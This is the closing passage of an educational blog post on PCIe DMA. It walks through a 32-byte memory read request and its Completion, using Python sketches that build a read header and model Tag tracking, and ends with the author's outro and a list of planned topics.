Here is a block diagram of the memory read request being generated by the device and how the request traverses through the hierarchy.

ERRATA: 0x32 should be 32

The steps outlined in this diagram are as follows:

DMA Engine Creates TLP - The DMA engine recognizes that it must read 32 bytes from 0x001FF000. It generates a TLP that contains this request and sends it out via its local PCIe link.
TLP Traverses Hierarchy - The switching hierarchy of PCIe moves this request through bridge devices until it arrives at its destination, which is the Root Complex. Recall that the RC is responsible for handling all incoming packets destined for accessing system RAM.
DRAM Controller is Notified - The Root Complex internally communicates with the DRAM controller which is responsible for actually accessing the memory of the system DRAM.
Memory is Read from DRAM - The given length of 32 bytes is requested from DRAM at address 0x001FF000 and returned to the Root Complex with the values 01 02 03 04…
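For a feel of what the DMA engine generates in the first step, here is a rough sketch that packs the three-DWORD header of a 32-bit Memory Read Request. The field layout follows the standard TLP header format, but the Requester BDF of 01:00.0 and the Tag of 0x01 are assumptions made up for this example, and optional fields such as Traffic Class and Attributes are simply left at zero.

```python
import struct

def make_bdf(bus, dev, func):
    """Pack Bus/Device/Function into a 16-bit ID: bus[15:8], dev[7:3], func[2:0]."""
    return (bus << 8) | (dev << 3) | func

def build_mrd32_header(requester_id, tag, address, length_bytes):
    """Build a 3DW Memory Read Request header for a DWORD-aligned read."""
    if address % 4 or length_bytes % 4:
        raise ValueError("this sketch only handles DWORD-aligned reads")
    length_dw = length_bytes // 4
    if not 1 <= length_dw <= 1023:
        raise ValueError("length out of range for this sketch")

    fmt, tlp_type = 0b000, 0b00000       # 3DW header without data, Memory Read
    dw0 = (fmt << 29) | (tlp_type << 24) | length_dw

    first_be = 0xF                       # all bytes of the first DWORD enabled
    last_be = 0xF if length_dw > 1 else 0x0
    dw1 = (requester_id << 16) | (tag << 8) | (last_be << 4) | first_be

    dw2 = address & 0xFFFFFFFC           # low two address bits are reserved

    # Header bytes are laid out most significant byte first.
    return struct.pack(">III", dw0, dw1, dw2)

# Hypothetical Requester 01:00.0 with Tag 0x01, reading 32 bytes at 0x001FF000.
header = build_mrd32_header(make_bdf(1, 0, 0), 0x01, 0x001FF000, 32)
print(header.hex())  # 00000008010001ff001ff000
```

The Length field counts DWORDs, which is why a 32-byte read shows up as 8 in the header. Notice also that nothing in the header names the destination device; only the address does.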

Try your best not to be overwhelmed by this information; I understand there’s a lot going on for a single memory request TLP. At a high level, all of this boils down to reading 32 bytes of memory from address 0x001FF000 in RAM. How the platform actually performs that DRAM read by communicating with the DRAM controller is shown just for your interest. The device itself is unaware of how the Root Complex actually reads this memory; it just initiates the transfer with the TLP.

NOTE: Not shown here is the even more complicated process of RAM caching. On x86-64, all memory accesses from devices are cache coherent, which means that the platform automatically synchronizes the CPU caches with the values being accessed by the device. On other platforms, such as ARM platforms, this is an even more involved process due to their cache architectures. For now, we will just assume that cache coherency is being handled automatically for us and we don’t have any special worries regarding it.

When the Root Complex received this TLP, it marked internally what the Requester and Tag were for the read. While it waits for DRAM to respond with the value, the request is held as pending in the Root Complex. To conceptualize this, think of it as an “open connection” on a network socket. The Root Complex knows what it needs to respond to, and therefore will wait until the response data is available before sending data back “over the socket”.
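The “open connection” idea can be sketched as a small table keyed by Requester and Tag. This is only a conceptual model: the `PendingReads` class and its method names are invented here, and a real Root Complex tracks this state in hardware.

```python
class PendingReads:
    """Conceptual model of the reads a Root Complex is waiting to complete."""

    def __init__(self):
        # (requester_id, tag) -> (address, length in bytes)
        self._pending = {}

    def __len__(self):
        return len(self._pending)

    def on_request(self, requester_id, tag, address, length):
        """Remember who asked and under which Tag while DRAM is being read."""
        key = (requester_id, tag)
        if key in self._pending:
            raise ValueError("this Tag is already in flight for this Requester")
        self._pending[key] = (address, length)

    def on_data_ready(self, requester_id, tag, data):
        """Close the pending entry and describe the Completion to send back."""
        _address, length = self._pending.pop((requester_id, tag))
        return {
            "destination": requester_id,  # copied from the request's Requester
            "tag": tag,                   # lets the device match the response
            "byte_count": length,
            "payload": data[:length],
        }

# Hypothetical Requester 01:00.0 (0x0100) with Tag 0x01.
table = PendingReads()
table.on_request(0x0100, 0x01, 0x001FF000, 32)
completion = table.on_data_ready(0x0100, 0x01, bytes(32))
print(hex(completion["destination"]), completion["byte_count"])
```

The Tag is what allows a device to have several reads outstanding at once and still tell the responses apart.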

Finally, the Completion is sent back from the Root Complex to the device. Note the Destination is the same as the Requester:

Here are the steps outlined with the response packet as seen above:

Memory is read from DRAM - 32 bytes are read from the address of the DMA Buffer at 0x001FF000 in system DRAM by the DRAM controller.
DRAM Controller Responds to Root Complex - The DRAM controller internally responds with the memory requested from DRAM to the Root Complex.
Root Complex Generates Completion - The Root Complex tracks the transfer and creates a Completion TLP for the values read from DRAM. In this TLP, the metadata values are set based on the knowledge that the RC has of the pending transfer, such as the number of bytes being sent, the Tag for the transfer, and the destination BDF that was copied from the Requester field in the original request.
DMA Engine Receives TLP - The DMA engine receives the TLP over the PCIe link and sees that the Tag matches the tag of the original request. It also internally tracks this value and knows that the memory in the payload should be written to Target Memory, which is at 0x8000 in the device’s internal RAM.
Target Memory is Written - The values in the device’s memory are updated with the values that were copied out of the Payload of the packet.
System is Interrupted - While this is optional, most DMA engines will be configured to interrupt the host CPU whenever the DMA is complete. This gives the device driver a notification when the DMA has been successfully completed by the device.
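The device side of these steps can be modeled in a few lines. This is a simplified sketch rather than how any particular DMA engine is built: the `DmaEngine` class is hypothetical, the interrupt is reduced to a flag, and the payload bytes beyond the first four shown in the example are placeholders.

```python
class DmaEngine:
    """Toy model of a device DMA engine receiving a read Completion."""

    def __init__(self, ram_size=0x10000):
        self.ram = bytearray(ram_size)  # the device's internal RAM
        self.outstanding = {}           # tag -> offset in device RAM
        self.interrupt_raised = False

    def start_read(self, tag, target_offset):
        """Record where the data for this Tag should land once it arrives."""
        self.outstanding[tag] = target_offset

    def on_completion(self, tag, payload):
        """Match the Tag, copy the payload to Target Memory, signal the host."""
        target = self.outstanding.pop(tag, None)
        if target is None:
            return False                # no matching request, ignore it
        self.ram[target:target + len(payload)] = payload
        self.interrupt_raised = True    # stands in for interrupting the host CPU
        return True

engine = DmaEngine()
engine.start_read(tag=0x01, target_offset=0x8000)

# Placeholder payload: starts with 01 02 03 04, the rest is invented.
payload = bytes(range(1, 33))
engine.on_completion(0x01, payload)
print(engine.ram[0x8000:0x8004].hex(), engine.interrupt_raised)
```

A second Completion carrying the same Tag would be rejected here, since the entry is removed as soon as the first one is handled.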

Again, this is a lot of steps for handling just this single completion packet. However, you can think of this whole thing as simply “a response of 32 bytes is received for the device’s request.” The rest of these steps just show you what the full end-to-end processing of this response looks like.

From here, the device driver is notified that the DMA is complete and the device driver’s code is responsible for cleaning up the DMA buffers or storing them away for use next time.

After all of this work, we have finally completed a single DMA transaction! And to think that this was the “simplest” form of a transfer I could provide. With the addition of IOMMU Remapping and Scatter-Gather Capability, these transactions can get even more complex. But for now, you should have a solid understanding of what DMA is all about and how it actually functions with a real device.

Outro - A Small Note on Complexity

If you finished reading this post and felt that you didn’t fully grasp all of the concepts thrown at you or feel overwhelmed by the complexity, you should not worry. The reason these posts are so complex is that they not only span a wide range of topics, but also span a wide range of professions. Typically each part of this overall system has distinct teams in the industry who focus only on their “cog” in this complex machine. Often hardware developers focus on the device, driver developers focus on the driver code, and OS developers focus on the resource management. There’s rarely much overlap between these teams, except when handing off at their boundary so another team can link up to it.

These posts are a bit unique in that they try to document the system as a whole for conceptual understanding, not implementation. This means that where team boundaries are usually drawn, these posts simply do not care. I encourage readers who find this topic interesting to continue to dig into it on their own time. Maybe you can learn a thing or two about FPGAs and start making your own devices, or maybe you can acquire a device and start trying to reverse engineer how it works and communicate with it using your own custom software.

An insatiable appetite for opening black boxes is what the “hacker” mindset is all about!

Conclusion

I hope you enjoyed this deep dive into memory transfer on PCIe! While I have covered a ton of information in this post, the rabbit hole always goes deeper. Thankfully, by learning about config space access, MMIO (BARs), and DMA, you have now covered every form of data communication available in PCIe! For every device connected to the PCIe bus, the communication between the host system and device will take place with one of these three methods. All of the setup and configuration of a device’s link, resources, and driver software is to eventually facilitate these three forms of communication.

A huge reason this post took so long to get out was the sheer amount of information that I would have to present to a reader in order to make sense of all of this. It’s hard to decide what is worth writing about and what adds so much depth that the understanding gets muddied. That decision paralysis has made the blog writing process take much longer than I intended. That, combined with a full time job, makes it difficult to find the time to get these posts written.

In the upcoming posts, I am looking forward to discussing some or all of the following topics:

PCIe switching/bridging and enumeration of the hierarchy
More advanced DMA topics, such as DMA Remapping
Power management; how devices “sleep” and “wake”
Interrupts and their allocation and handling by the platform/OS
Simple driver development examples for a device

As always, if you have any questions or wish to comment or discuss an aspect of this series, you can best find me by “@gbps” in the #hardware channel on my discord, the Reverse Engineering discord: https://discord.com/invite/rtfm

Please look forward to future posts!

-Gbps